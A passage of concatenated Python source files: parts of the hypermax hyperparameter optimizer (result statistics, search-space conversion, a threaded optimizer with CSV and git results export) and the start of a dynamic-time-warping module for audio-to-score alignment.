statistics['correlation_best_percentile25_ratio'] = 0
statistics['correlation_best_percentile50_ratio'] = 0
statistics['correlation_best_percentile75_ratio'] = 0
statistics['correlation_percentile5_percentile25_ratio'] = 0
else:
bestCorrelation = numpy.percentile(correlations, 100) # Correlations are in the opposite order of losses, higher correlation is considered "best"
percentile5Correlation = numpy.percentile(correlations, 95)
percentile25Correlation = numpy.percentile(correlations, 75)
percentile50Correlation = numpy.percentile(correlations, 50)
percentile75Correlation = numpy.percentile(correlations, 25)
statistics['correlation_skew'] = scipy.stats.skew(correlations)
statistics['correlation_kurtosis'] = scipy.stats.kurtosis(correlations)
if percentile50Correlation == 0:
statistics['correlation_stddev_median_ratio'] = 0
statistics['correlation_best_percentile50_ratio'] = 0
else:
statistics['correlation_stddev_median_ratio'] = numpy.std(correlations) / percentile50Correlation
statistics['correlation_best_percentile50_ratio'] = bestCorrelation / percentile50Correlation
if bestCorrelation == 0:
statistics['correlation_stddev_best_ratio'] = 0
else:
statistics['correlation_stddev_best_ratio'] = numpy.std(correlations) / bestCorrelation
if percentile25Correlation == 0:
statistics['correlation_best_percentile25_ratio'] = 0
statistics['correlation_percentile5_percentile25_ratio'] = 0
else:
statistics['correlation_best_percentile25_ratio'] = bestCorrelation / percentile25Correlation
statistics['correlation_percentile5_percentile25_ratio'] = percentile5Correlation / percentile25Correlation
if percentile75Correlation == 0:
statistics['correlation_best_percentile75_ratio'] = 0
else:
statistics['correlation_best_percentile75_ratio'] = bestCorrelation / percentile75Correlation
return statistics
def computeAllResultStatistics(self, hyperparameterSpace, results):
losses = numpy.array(sorted([result['loss'] for result in results if result['loss'] is not None]))
if len(set(losses)) > 1:
percentile10Loss = numpy.percentile(losses, 10)
percentile20Loss = numpy.percentile(losses, 20)
percentile30Loss = numpy.percentile(losses, 30)
else:
percentile10Loss = losses[0]
percentile20Loss = losses[0]
percentile30Loss = losses[0]
allResults = list(results)
percentile10Results = [result for result in results if result['loss'] is not None and result['loss'] <= percentile10Loss]
percentile20Results = [result for result in results if result['loss'] is not None and result['loss'] <= percentile20Loss]
percentile30Results = [result for result in results if result['loss'] is not None and result['loss'] <= percentile30Loss]
recent10Count = min(len(results), 10)
recent10Results = results[-recent10Count:]
recent25Count = min(len(results), 25)
recent25Results = results[-recent25Count:]
recent15PercentCount = max(math.ceil(len(results) * 0.15), 5)
recent15PercentResults = results[-recent15PercentCount:]
statistics = {}
allResultStatistics = self.computePartialResultStatistics(hyperparameterSpace, allResults)
for stat, value in allResultStatistics.items():
statistics['all_' + stat] = value
percentile10Statistics = self.computePartialResultStatistics(hyperparameterSpace, percentile10Results)
for stat, value in percentile10Statistics.items():
statistics['top_10%_' + stat] = value
percentile20Statistics = self.computePartialResultStatistics(hyperparameterSpace, percentile20Results)
for stat, value in percentile20Statistics.items():
statistics['top_20%_' + stat] = value
percentile30Statistics = self.computePartialResultStatistics(hyperparameterSpace, percentile30Results)
for stat, value in percentile30Statistics.items():
statistics['top_30%_' + stat] = value
recent10Statistics = self.computePartialResultStatistics(hyperparameterSpace, recent10Results)
for stat, value in recent10Statistics.items():
statistics['recent_10_' + stat] = value
recent25Statistics = self.computePartialResultStatistics(hyperparameterSpace, recent25Results)
for stat, value in recent25Statistics.items():
statistics['recent_25_' + stat] = value
recent15PercentResult = self.computePartialResultStatistics(hyperparameterSpace, recent15PercentResults)
for stat, value in recent15PercentResult.items():
statistics['recent_15%_' + stat] = value
# Although we have added lots of protection in the computePartialResultStatistics code, one last hedge against any NaN or infinity values coming up
# in our statistics
for key in statistics.keys():
if math.isnan(statistics[key]) or math.isinf(statistics[key]):
statistics[key] = 0
return statistics
```
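In `__init__` above, the fitted feature scalers are not pickled; instead their means, scales and variances are stored as JSON and reassigned to fresh `StandardScaler` objects. The minimal sketch below illustrates that restore-and-transform step; the numbers are invented, and only the reassignment pattern mirrors the code above.

```python
import numpy
import sklearn.preprocessing

# Hypothetical stored statistics for a single one-dimensional feature
stored = {"means": [0.12], "scales": [0.8], "variances": [0.64]}

scaler = sklearn.preprocessing.StandardScaler()
scaler.mean_ = numpy.array(stored["means"])
scaler.scale_ = numpy.array(stored["scales"])
scaler.var_ = numpy.array(stored["variances"])

# transform() now behaves as if the scaler had been fitted on the original data:
# (0.5 - 0.12) / 0.8 == 0.475
print(scaler.transform([[0.5]]))
```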
#### File: hypermax/hypermax/file_utils.py
```python
from contextlib import contextmanager
import tempfile
import os
# Windows doesn't allow reopening a NamedTemporaryFile by name while it is still open.
# Solution inspired by https://stackoverflow.com/a/46501017/147507
@contextmanager
def ClosedNamedTempFile(contents):
try:
with tempfile.NamedTemporaryFile(delete=False) as f:
file_name = f.name
f.write(contents)
yield file_name
finally:
os.unlink(file_name)
```
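A short usage sketch for the context manager above: the contents are written and the handle closed before the body runs, so the file can be reopened by name (as `ATPEOptimizer` does when handing model files to LightGBM), including on Windows; the file is removed when the block exits.

```python
from hypermax.file_utils import ClosedNamedTempFile

with ClosedNamedTempFile(b"model contents") as model_file_name:
    # the file is already closed here, so any library can reopen it by name
    with open(model_file_name, "rb") as f:
        print(f.read())  # b'model contents'
# the temporary file has been deleted at this point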
#### File: hypermax/hypermax/hyperparameter.py
```python
from hyperopt import hp
import math
from pprint import pprint
import re
class Hyperparameter:
""" This class represents a hyperparameter."""
def __init__(self, config, parent=None, root='root'):
self.config = config
self.root = root
self.name = root[5:]
self.parent = parent
self.resultVariableName = re.sub("\\.\\d+\\.", ".", self.name)
self.hyperoptVariableName = self.root
if 'name' in config:
self.hyperoptVariableName = config['name']
def createHyperoptSpace(self, lockedValues=None):
name = self.root
if lockedValues is None:
lockedValues = {}
if 'anyOf' in self.config or 'oneOf' in self.config:
data = []
if 'anyOf' in self.config:
data = self.config['anyOf']
else:
data = self.config['oneOf']
subSpaces = [Hyperparameter(param, self, name + "." + str(index)).createHyperoptSpace(lockedValues) for index, param in enumerate(data)]
for index, space in enumerate(subSpaces):
space["$index"] = index
choices = hp.choice(self.hyperoptVariableName, subSpaces)
return choices
elif 'enum' in self.config:
if self.name in lockedValues:
return lockedValues[self.name]
choices = hp.choice(self.hyperoptVariableName, self.config['enum'])
return choices
elif 'constant' in self.config:
if self.name in lockedValues:
return lockedValues[self.name]
return self.config['constant']
elif self.config['type'] == 'object':
space = {}
for key in self.config['properties'].keys():
config = self.config['properties'][key]
space[key] = Hyperparameter(config, self, name + "." + key).createHyperoptSpace(lockedValues)
return space
elif self.config['type'] == 'number':
if self.name in lockedValues:
return lockedValues[self.name]
mode = self.config.get('mode', 'uniform')
scaling = self.config.get('scaling', 'linear')
if mode == 'uniform':
min = self.config.get('min', 0)
max = self.config.get('max', 1)
rounding = self.config.get('rounding', None)
if scaling == 'linear':
if rounding is not None:
return hp.quniform(self.hyperoptVariableName, min, max, rounding)
else:
return hp.uniform(self.hyperoptVariableName, min, max)
elif scaling == 'logarithmic':
if rounding is not None:
return hp.qloguniform(self.hyperoptVariableName, math.log(min), math.log(max), rounding)
else:
return hp.loguniform(self.hyperoptVariableName, math.log(min), math.log(max))
if mode == 'randint':
max = self.config.get('max', 1)
return hp.randint(self.hyperoptVariableName, max)
if mode == 'normal':
mean = self.config.get('mean', 0)
stddev = self.config.get('stddev', 1)
rounding = self.config.get('rounding', None)
if scaling == 'linear':
if rounding is not None:
return hp.qnormal(self.hyperoptVariableName, mean, stddev, rounding)
else:
return hp.normal(self.hyperoptVariableName, mean, stddev)
elif scaling == 'logarithmic':
if rounding is not None:
return hp.qlognormal(self.hyperoptVariableName, math.log(mean), math.log(stddev), rounding)
else:
return hp.lognormal(self.hyperoptVariableName, math.log(mean), math.log(stddev))
def getFlatParameterNames(self):
name = self.root
if 'anyOf' in self.config or 'oneOf' in self.config:
keys = set()
if 'anyOf' in self.config:
data = self.config['anyOf']
else:
data = self.config['oneOf']
for index, param in enumerate(data):
subKeys = Hyperparameter(param, self, name + "." + str(index)).getFlatParameterNames()
for key in subKeys:
keys.add(key)
return keys
elif 'enum' in self.config or 'constant' in self.config:
return [name]
elif self.config['type'] == 'object':
keys = set()
for key in self.config['properties'].keys():
config = self.config['properties'][key]
subKeys = Hyperparameter(config, self, name + "." + key).getFlatParameterNames()
for key in subKeys:
keys.add(key)
return keys
elif self.config['type'] == 'number':
return [name]
def getFlatParameters(self):
name = self.root
if 'anyOf' in self.config or 'oneOf' in self.config:
parameters = []
if 'anyOf' in self.config:
data = self.config['anyOf']
else:
data = self.config['oneOf']
for index, param in enumerate(data):
subParameters = Hyperparameter(param, self, name + "." + str(index)).getFlatParameters()
parameters = parameters + subParameters
return parameters
elif 'enum' in self.config or 'constant' in self.config:
return [self]
elif self.config['type'] == 'object':
parameters = []
for key in self.config['properties'].keys():
config = self.config['properties'][key]
subParameters = Hyperparameter(config, self, name + "." + key).getFlatParameters()
parameters = parameters + subParameters
return parameters
elif self.config['type'] == 'number':
return [self]
def getLog10Cardinality(self):
if 'anyOf' in self.config or 'oneOf' in self.config:
if 'anyOf' in self.config:
data = self.config['anyOf']
else:
data = self.config['oneOf']
log10_cardinality = Hyperparameter(data[0], self, self.root + ".0").getLog10Cardinality()
for index, subParam in enumerate(data[1:]):
# We used logarithm identities to create this reduction formula
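                # (editor's note) concretely: log10(A + B) = log10(B) + log10(1 + 10 ** (log10(A) - log10(B))), which is what the else branch below computes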
other_log10_cardinality = Hyperparameter(subParam, self, self.root + "." + str(index)).getLog10Cardinality()
# Revert to linear at high and low values, for numerical stability. Check here: https://www.desmos.com/calculator/efkbbftd18 to observe
if (log10_cardinality - other_log10_cardinality) > 3:
log10_cardinality = log10_cardinality + 1
elif (other_log10_cardinality - log10_cardinality) > 3:
log10_cardinality = other_log10_cardinality + 1
else:
log10_cardinality = other_log10_cardinality + math.log10(1 + math.pow(10, log10_cardinality - other_log10_cardinality))
return log10_cardinality + math.log10(len(data))
elif 'enum' in self.config:
return math.log10(len(self.config['enum']))
elif 'constant' in self.config:
return math.log10(1)
elif self.config['type'] == 'object':
log10_cardinality = 0
for index, subParam in enumerate(self.config['properties'].values()):
subParameter = Hyperparameter(subParam, self, self.root + "." + str(index))
log10_cardinality += subParameter.getLog10Cardinality()
return log10_cardinality
elif self.config['type'] == 'number':
if 'rounding' in self.config:
return math.log10(min(20, (self.config['max'] - self.config['min']) / self.config['rounding'] + 1))
else:
return math.log10(20) # Default of 20 for fully uniform numbers.
def convertToFlatValues(self, params):
flatParams = {}
def recurse(key, value, root):
result_key = root + "." + key
if isinstance(value, str):
flatParams[result_key[1:]] = value
elif isinstance(value, float) or isinstance(value, bool) or isinstance(value, int):
flatParams[result_key[1:]] = value
elif isinstance(value, dict):
for subkey, subvalue in value.items():
recurse(subkey, subvalue, result_key)
for key in params.keys():
value = params[key]
recurse(key, value, '')
flatValues = {}
if 'anyOf' in self.config or 'oneOf' in self.config:
if 'anyOf' in self.config:
data = self.config['anyOf']
else:
data = self.config['oneOf']
subParameterIndex = flatParams[self.resultVariableName + '.$index']
flatValues[self.name] = subParameterIndex
for index, param in enumerate(data):
subParameter = Hyperparameter(param, self, self.root + "." + str(index))
if index == subParameterIndex:
subFlatValues = subParameter.convertToFlatValues(flatParams)
for key in subFlatValues:
flatValues[key] = subFlatValues[key]
else:
for flatParam in subParameter.getFlatParameters():
flatValues[flatParam.name] = ""
return flatValues
elif 'constant' in self.config:
flatValues[self.name] = flatParams[self.resultVariableName]
return flatValues
elif 'enum' in self.config:
flatValues[self.name] = flatParams[self.resultVariableName]
return flatValues
elif self.config['type'] == 'object':
for key in self.config['properties'].keys():
config = self.config['properties'][key]
subFlatValues = Hyperparameter(config, self, self.root + "." + key).convertToFlatValues(flatParams)
for key in subFlatValues:
flatValues[key] = subFlatValues[key]
if self.name == "":
for key in params.keys():
if key.startswith("$"):
flatValues[key] = params[key]
return flatValues
elif self.config['type'] == 'number':
flatValues[self.name] = flatParams[self.resultVariableName]
return flatValues
def convertToStructuredValues(self, flatValues):
if 'anyOf' in self.config or 'oneOf' in self.config:
if 'anyOf' in self.config:
data = self.config['anyOf']
else:
data = self.config['oneOf']
subParameterIndex = flatValues[self.name]
subParam = Hyperparameter(data[subParameterIndex], self, self.root + "." + str(subParameterIndex))
structured = subParam.convertToStructuredValues(flatValues)
structured['$index'] = subParameterIndex
return structured
elif 'constant' in self.config:
return flatValues[self.name]
elif 'enum' in self.config:
return flatValues[self.name]
elif self.config['type'] == 'object':
result = {}
for key in self.config['properties'].keys():
config = self.config['properties'][key]
subStructuredValue = Hyperparameter(config, self, self.root + "." + key).convertToStructuredValues(flatValues)
result[key] = subStructuredValue
if self.name == "":
for key in flatValues.keys():
if key.startswith("$"):
result[key] = flatValues[key]
return result
elif self.config['type'] == 'number':
return flatValues[self.name]
@staticmethod
def createHyperparameterConfigForHyperoptDomain(domain):
if domain.name is None:
data = {
"type": "object",
"properties": {}
}
for key in domain.params:
data['properties'][key] = Hyperparameter.createHyperparameterConfigForHyperoptDomain(domain.params[key])
if 'name' not in data['properties'][key]:
data['properties'][key]['name'] = key
return data
elif domain.name == 'dict':
data = {
"type": "object",
"properties": {}
}
for item in domain.named_args:
data['properties'][item[0]] = Hyperparameter.createHyperparameterConfigForHyperoptDomain(item[1])
return data
elif domain.name == 'switch':
data = {
"oneOf": [
]
}
data['name'] = domain.pos_args[0].pos_args
for item in domain.pos_args[1:]:
data['oneOf'].append(Hyperparameter.createHyperparameterConfigForHyperoptDomain(item))
return data
elif domain.name == 'hyperopt_param':
data = Hyperparameter.createHyperparameterConfigForHyperoptDomain(domain.pos_args[1])
data['name'] = domain.pos_args[0]._obj
return data
elif domain.name == 'uniform':
data = {"type": "number"}
data['scaling'] = 'linear'
data['mode'] = 'uniform'
data['min'] = domain.pos_args[0]._obj
data['max'] = domain.pos_args[1]._obj
return data
elif domain.name == 'quniform':
data = {"type": "number"}
data['scaling'] = 'linear'
data['mode'] = 'uniform'
data['min'] = domain.pos_args[0]._obj
data['max'] = domain.pos_args[1]._obj
data['rounding'] = domain.pos_args[2]._obj
return data
elif domain.name == 'loguniform':
data = {"type": "number"}
data['scaling'] = 'logarithmic'
data['mode'] = 'uniform'
data['min'] = math.exp(domain.pos_args[0]._obj)
data['max'] = math.exp(domain.pos_args[1]._obj)
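            # hyperopt's loguniform takes bounds in log space, so they are converted
            # back to linear space here with exp()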
return data
elif domain.name == 'qloguniform':
data = {"type": "number"}
data['scaling'] = 'logarithmic'
data['mode'] = 'uniform'
data['min'] = math.exp(domain.pos_args[0]._obj)
data['max'] = math.exp(domain.pos_args[1]._obj)
data['rounding'] = domain.pos_args[2]._obj
return data
elif domain.name == 'normal':
data = {"type": "number"}
data['scaling'] = 'linear'
data['mode'] = 'normal'
data['mean'] = domain.pos_args[0]._obj
data['stddev'] = domain.pos_args[1]._obj
return data
elif domain.name == 'qnormal':
data = {"type": "number"}
data['scaling'] = 'linear'
data['mode'] = 'normal'
data['mean'] = domain.pos_args[0]._obj
data['stddev'] = domain.pos_args[1]._obj
data['rounding'] = domain.pos_args[2]._obj
return data
elif domain.name == 'lognormal':
data = {"type": "number"}
data['scaling'] = 'logarithmic'
data['mode'] = 'normal'
data['mean'] = domain.pos_args[0]._obj
data['stddev'] = domain.pos_args[1]._obj
return data
elif domain.name == 'qlognormal':
data = {"type": "number"}
data['scaling'] = 'logarithmic'
data['mode'] = 'normal'
data['mean'] = domain.pos_args[0]._obj
data['stddev'] = domain.pos_args[1]._obj
data['rounding'] = domain.pos_args[2]._obj
return data
elif domain.name == 'literal':
data = {
'type': 'string',
'constant': domain._obj
}
return data
elif domain.name == 'randint':
data = {"type": "number"}
max = domain.pos_args[0]._obj
data['max'] = max
data['mode'] = 'randint'
return data
else:
raise ValueError(f"Unsupported hyperopt domain type {domain.name}")
```
#### File: hypermax/hypermax/optimizer.py
```python
import hyperopt
import csv
import json
import traceback
import os.path
from pprint import pprint
import datetime
import time
import numpy.random
import threading
import queue
import copy
import tempfile
import random
import subprocess
import concurrent.futures
import tempfile
import functools
import math
import atexit
import jsonschema
import pkg_resources
from hypermax.execution import Execution
from hypermax.hyperparameter import Hyperparameter
from hypermax.results_analyzer import ResultsAnalyzer
from hypermax.algorithms.atpe_optimizer import ATPEOptimizer
from hypermax.algorithms.human_guided_optimizer_wrapper import HumanGuidedOptimizerWrapper
from hypermax.algorithms.tpe_optimizer import TPEOptimizer
from hypermax.algorithms.random_search_optimizer import RandomSearchOptimizer
from hypermax.algorithms.adaptive_bayesian_hyperband_optimizer import AdaptiveBayesianHyperband
from hypermax.configuration import Configuration
class Optimizer:
resultInformationKeys = [
'trial',
'status',
'loss',
'time',
'log',
'error'
]
def __init__(self, configuration):
self.config = Configuration(configuration)
self.searchConfig = configuration.get('search', {})
# jsonschema.validate(self.searchConfig, self.configurationSchema())
self.space = self.config.createHyperparameterSpace()
self.threadExecutor = concurrent.futures.ThreadPoolExecutor()
self.resultsAnalyzer = ResultsAnalyzer(configuration)
self.results = []
self.resultFutures = []
self.best = None
self.bestLoss = None
self.thread = threading.Thread(target=lambda: self.optimizationThread(), daemon=True if configuration.get("ui", {}).get("enabled", True) else False)
self.totalTrials = self.searchConfig.get("iterations")
self.trialsSinceResultsUpload = None
self.resultsExportFuture = None
self.currentTrials = []
self.allWorkers = set(range(self.config.data['function'].get('parallel', 1)))
self.occupiedWorkers = set()
self.trialNumber = 0
self.lastATPEParameters = None
self.lastLockedParameters = None
self.atpeParamDetails = None
self.tpeOptimizer = TPEOptimizer()
self.atpeOptimizer = ATPEOptimizer()
self.abhOptimizer = AdaptiveBayesianHyperband(self.atpeOptimizer, self.searchConfig.get("min_budget", 1), self.searchConfig.get("max_budget", 100), self.searchConfig.get("eta", 3))
self.humanGuidedATPEOptimizer = HumanGuidedOptimizerWrapper(self.atpeOptimizer)
self.randomSearchOptimizer = RandomSearchOptimizer()
def __del__(self):
if self.threadExecutor:
self.threadExecutor.shutdown(wait=True)
@classmethod
def configurationSchema(self):
""" This method returns the configuration schema for the optimization module. The schema
is a standard JSON-schema object."""
return {
"type": "object",
"properties": {
"method": {"type": "string", "enum": ['atpe', 'tpe', 'random']},
"iterations": {"type": "number"},
"budget": {"type": "number"}
},
"required": ['method', 'iterations']
}
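        # Illustrative config satisfying this schema (example values, not from the
        # original source): {"method": "atpe", "iterations": 250, "budget": 3600}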
def completed(self):
return len(self.results)
def sampleNext(self):
if self.searchConfig['method'] == 'tpe':
return self.tpeOptimizer.recommendNextParameters(self.config.data['hyperparameters'], self.results, self.currentTrials)
elif self.searchConfig['method'] == 'random':
return self.randomSearchOptimizer.recommendNextParameters(self.config.data['hyperparameters'], self.results, self.currentTrials)
elif self.searchConfig['method'] == 'atpe':
params = self.humanGuidedATPEOptimizer.recommendNextParameters(self.config.data['hyperparameters'], self.results, self.currentTrials)
self.lastATPEParameters = self.atpeOptimizer.lastATPEParameters
self.lastLockedParameters = self.atpeOptimizer.lastLockedParameters
self.atpeParamDetails = self.atpeOptimizer.atpeParamDetails
return params
elif self.searchConfig['method'] == 'abh':
params = self.abhOptimizer.recommendNextParameters(self.config.data['hyperparameters'], self.results, self.currentTrials)
self.lastATPEParameters = self.atpeOptimizer.lastATPEParameters
self.lastLockedParameters = self.atpeOptimizer.lastLockedParameters
self.atpeParamDetails = self.atpeOptimizer.atpeParamDetails
return params
def computeCurrentBest(self):
best = None
bestLoss = None
for result in self.results:
if (best is None and result['loss'] is not None ) or (result['loss'] is not None and result['loss'] < bestLoss):
best = result
bestLoss = result['loss']
self.best = best
self.bestLoss = bestLoss
def startOptmizationJob(self):
availableWorkers = list(sorted(self.allWorkers.difference(self.occupiedWorkers)))
sampleWorker = availableWorkers[0]
sample = None
while sample is None:
# Hedge against any exceptions in the atpe optimizer.
try:
sample = self.sampleNext()
except Exception:
traceback.print_exc()
pass
def testSample(params, trial, worker):
currentTrial = {
"start": datetime.datetime.now(),
"trial": trial,
"worker": worker,
"params": copy.deepcopy(params)
}
self.currentTrials.append(currentTrial)
start = datetime.datetime.now()
execution = Execution(self.config.data['function'], parameters=params, worker_n=worker)
modelResult = execution.run()
end = datetime.datetime.now()
result = Hyperparameter(self.config.data['hyperparameters']).convertToFlatValues(params)
for key in params.keys():
if key.startswith("$"):
result[key] = params[key]
result['trial'] = trial
self.resultsAnalyzer.makeDirs(os.path.join(self.resultsAnalyzer.directory, "logs"))
if 'loss' in modelResult:
result['loss'] = modelResult['loss']
elif 'accuracy' in modelResult:
result['loss'] = modelResult['accuracy']
if 'status' in modelResult:
result['status'] = modelResult['status']
else:
result['status'] = 'ok'
if 'log' in modelResult:
fileName = os.path.join(self.resultsAnalyzer.directory, "logs", "trial_" + str(trial) + ".txt")
with open(fileName, "wt") as file:
file.write(modelResult['log'])
result['log'] = fileName
else:
result['log'] = ''
if 'error' in modelResult:
result['error'] = modelResult['error']
else:
result['error'] = ''
if 'time' in modelResult:
result['time'] = modelResult['time']
else:
result['time'] = (end-start).total_seconds()
self.currentTrials.remove(currentTrial)
return result
def onCompletion(worker, future):
self.occupiedWorkers.remove(worker)
self.results.append(future.result())
self.computeCurrentBest()
if not self.config.data.get("ui", {}).get("enabled", True):
pprint(future.result())
if self.resultsExportFuture is None or (self.resultsExportFuture.done() and len(self.results) > 5):
self.resultsExportFuture = self.threadExecutor.submit(
lambda: self.outputResultsWithBackup(self.config.data.get("results", {}).get("graphs", True)))
else:
self.outputResultsWithBackup(False)
if 'hypermax_results' in self.config.data:
if self.trialsSinceResultsUpload is None or self.trialsSinceResultsUpload >= self.config.data['hypermax_results']['upload_frequency']:
self.saveResultsToHypermaxResultsRepository()
self.trialsSinceResultsUpload = 1
else:
self.trialsSinceResultsUpload += 1
self.occupiedWorkers.add(sampleWorker)
sampleFuture = self.threadExecutor.submit(testSample, sample, self.trialNumber, sampleWorker)
sampleFuture.add_done_callback(functools.partial(onCompletion, sampleWorker))
self.trialNumber += 1
return sampleFuture
def runOptimizationThread(self):
self.thread.start()
def outputResultsWithBackup(self, graphs, workers=1):
self.resultsAnalyzer.outputResultsFolder(self, graphs, workers=workers)
directory_head, directory_tail = os.path.split(self.resultsAnalyzer.directory)
backup_directory = os.path.join(directory_head, ".backup_" + directory_tail + "~")
self.resultsAnalyzer.outputResultsFolder(self, graphs, directory=backup_directory, workers=workers)
def optimizationThread(self):
# Make sure we output basic results if the process is killed for some reason.
atexit.register(lambda: self.outputResultsWithBackup(False))
futures = []
for worker in range(min(len(self.allWorkers), self.totalTrials - len(self.results))):
futures.append(self.startOptmizationJob())
time.sleep(1.0)
while (len(self.results) + len(self.currentTrials)) < self.totalTrials:
completedFuture = list(concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)[0])[0]
futures.remove(completedFuture)
time.sleep(0.05)
futures.append(self.startOptmizationJob())
concurrent.futures.wait(futures)
# We are completed, so we can allocate a full contingent of workers
self.outputResultsWithBackup(True, workers=4)
def exportGuidanceJSON(self, fileName):
with open(fileName, 'wt') as file:
json.dump(self.humanGuidedATPEOptimizer.guidanceOptions, file, indent=4, sort_keys=True)
def importGuidanceJSON(self, fileName):
with open(fileName, 'rt') as file:
self.humanGuidedATPEOptimizer.guidanceOptions = json.load(file)
def exportResultsCSV(self, fileName):
allKeys = set()
for result in self.results:
for key in result:
allKeys.add(key)
fieldNames = self.resultInformationKeys + sorted(allKeys.difference(set(self.resultInformationKeys))) # Make sure we keep the order of the field names consistent when writing the csv
with open(fileName, 'wt') as file:
writer = csv.DictWriter(file, fieldnames=fieldNames if len(self.results) > 0 else [], dialect='unix')
writer.writeheader()
writer.writerows(self.results)
def importResultsCSV(self, fileName):
with open(fileName) as file:
reader = csv.DictReader(file)
results = list(reader)
newResults = []
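        # values are re-typed heuristically: strings containing '.' or 'e' become
        # floats, other numerics become ints, unparseable values stay strings, and
        # empty 'loss' entries become None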
for result in results:
newResult = {}
for key,value in result.items():
if value is not None and value != "":
try:
if '.' in value or 'e' in value:
newResult[key] = float(value)
else:
newResult[key] = int(value)
except ValueError:
newResult[key] = value
elif key == 'loss':
newResult[key] = None
elif key == 'log':
newResult[key] = ''
else:
newResult[key] = None
newResults.append(newResult)
self.results = newResults
self.computeCurrentBest()
self.trialNumber = len(self.results)
def saveResultsToHypermaxResultsRepository(self):
try:
hypermaxResultsConfig = self.config.data['hypermax_results']
with tempfile.TemporaryDirectory() as directory:
process = subprocess.run(['git', 'clone', '<EMAIL>:electricbrainio/hypermax-results.git'], cwd=directory, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
hypermaxResultsDirectory = os.path.join(directory, 'hypermax-results', hypermaxResultsConfig['name'])
self.resultsAnalyzer.outputResultsFolder(self, detailed=False, directory=hypermaxResultsDirectory)
with open(os.path.join(hypermaxResultsDirectory, "metadata.json"), 'wt') as file:
json.dump(self.config.data['hypermax_results'], file, indent=4)
process = subprocess.run(['git', 'add', hypermaxResultsDirectory], cwd=os.path.join(directory, 'hypermax-results'))
process = subprocess.run(['git', 'commit', '-m', 'Hypermax automatically storing results for model ' + hypermaxResultsConfig['name'] + ' with ' + str(len(self.results)) + " trials."], cwd=os.path.join(directory, 'hypermax-results'), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process = subprocess.run(['git push'], cwd=os.path.join(directory, 'hypermax-results'), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
except Exception as e:
print(e)
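# Illustrative usage (a hedged sketch; the configuration dict follows hypermax's
# own schema with e.g. 'hyperparameters', 'function' and 'search' sections):
#   optimizer = Optimizer(configurationDict)
#   optimizer.runOptimizationThread()   # spawns the background optimization thread
#   ...                                 # wait for trials to complete
#   optimizer.exportResultsCSV('results.csv')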
``` |
{
"source": "00sapo/MMSP2021-Audio2ScoreAlignment",
"score": 3
} |
#### File: MMSP2021-Audio2ScoreAlignment/alignment/fede_dtw.py
```python
from math import floor
from typing import Callable
import numpy as np
import plotly.express as px
from dtw import stepPattern as sp
# yapf: disable
# DTW
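# Note on the tables below: following dtw-python's StepPattern convention, each
# group of four numbers passed to sp._c() is (sub-path id, delta query index,
# delta reference index, cost weight); a weight of -1 marks the entry cell of a
# sub-path.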
#: a symmetric pattern for DTW
symmetric = sp.StepPattern(
sp._c(
# diagonal
1, 1, 1, -1,
1, 0, 0, 3,
# vertical
2, 1, 0, -1,
2, 0, 0, 2,
# horizontal
3, 0, 1, -1,
3, 0, 0, 2,
# 1 vertical + diagonal
4, 2, 1, -1,
4, 1, 0, 2,
4, 0, 0, 2,
# 1 horizontal + diagonal
5, 1, 2, -1,
5, 0, 1, 2,
5, 0, 0, 2,
),
"NA")
#: an asymmetric pattern which favours the horizontal paths (changing column is
#: easier than changing row)
asymmetric_hor = sp.StepPattern(
sp._c(
# diagonal
1, 1, 1, -1,
1, 0, 0, 3,
# vertical
2, 1, 0, -1,
2, 0, 0, 2,
# horizontal
3, 0, 1, -1,
3, 0, 0, 1,
# 1 vertical + diagonal
4, 2, 1, -1,
4, 1, 0, 2,
4, 0, 0, 2,
# 1 horizontal + diagonal
5, 1, 2, -1,
5, 0, 1, 2,
5, 0, 0, 1,
),
"NA")
#: an asymmetric pattern which favours the vertical paths (changing row is
#: easier than changing column)
asymmetric_ver = sp.StepPattern(
sp._c(
# diagonal
1, 1, 1, -1,
1, 0, 0, 3,
# vertical
2, 1, 0, -1,
2, 0, 0, 1,
# horizontal
3, 0, 1, -1,
3, 0, 0, 2,
# 1 vertical + diagonal
4, 2, 1, -1,
4, 1, 0, 2,
4, 0, 0, 1,
# 1 horizontal + diagonal
5, 1, 2, -1,
5, 0, 1, 2,
5, 0, 0, 2,
),
"NA")
#: an asymmetric pattern which favours the vertical paths (changing row is
#: easier than changing column); this is like dtw.stepPattern.asymmetric, but
#: that one favours horizontal paths
asymmetric1 = sp.StepPattern(
sp._c(
# diagonal
1, 1, 1, -1,
1, 0, 0, 1,
# vertical
2, 0, 1, -1,
2, 0, 0, 1,
# second diagonal
3, 2, 1, -1,
3, 0, 0, 1
),
"N")
# yapf: enable
symmetric1 = sp.symmetric1
symmetric2 = sp.symmetric2
asymmetric2 = sp.asymmetric
step_patterns = (
asymmetric_hor,
asymmetric_ver,
symmetric,
symmetric1,
symmetric2,
asymmetric1,
asymmetric2,
)
def avg_dist(dist: Callable, dist_args: dict):
def new_dist(x: list, y: list):
out = 0
for i in range(len(x)):
out += dist(x[i], y[i], **dist_args)
return out / len(x)
return new_dist
def idx_range(idx, radius, length):
"""
given an idx, a radius and a maximum length, returns starting and ending
    indices of a window centered at that idx and having that radius, without
indices > length nor < 0
"""
return max(0, idx - radius), min(length, idx + radius + 1)
class FedeWindow(object):
"""
A windowing function which computes a different slanted-band at each point
based on the local difference of the main slanted diagonal; the local
radius is computed as:
`max(
min_radius,
floor(
alpha * avg_dist_fn(
x[i - beta : i + beta],
y[j - beta : j + beta]
)
)
)`
where:
* N is the length of x
* M is the length of y
* avg_dist_fn is the average of dist_fn on each corresponding sample
* j = floor(i * M / N)
    In words, `beta` is half the length of a sliding window used to compute
distances between excerpts of `x` and `y` taken along the slanted diagonal.
The distance is multiplied by `alpha` to get the local radius length.
`x` and `y` are sequences with shape ([M, N], features)
"""
def __init__(self,
x,
y,
dist_fn: Callable,
alpha=5,
beta=5,
min_radius=5,
dist_args: dict = {}):
self.alpha = alpha
self.beta = beta
self.min_radius = min_radius
self.dist_fn = avg_dist(dist_fn, dist_args)
self.compute_mask(x, y)
def compute_mask(self, x, y):
# take the distance function
N = len(x)
M = len(y)
transpose = False
if M > N:
# x should always be longer than y
x, y = y, x
N, M = M, N
# if we swap x and y, we need to swap the mask too
transpose = True
# a mask to remember points
self.mask = np.zeros((len(x), len(y)), dtype=np.bool8)
# for each point in x
for i in range(N):
# compute the point in y along the diagonal
j = floor(i * M / N)
# compute the sliding windows
start_x, end_x = idx_range(i, self.beta, N)
start_y, end_y = idx_range(j, self.beta, M)
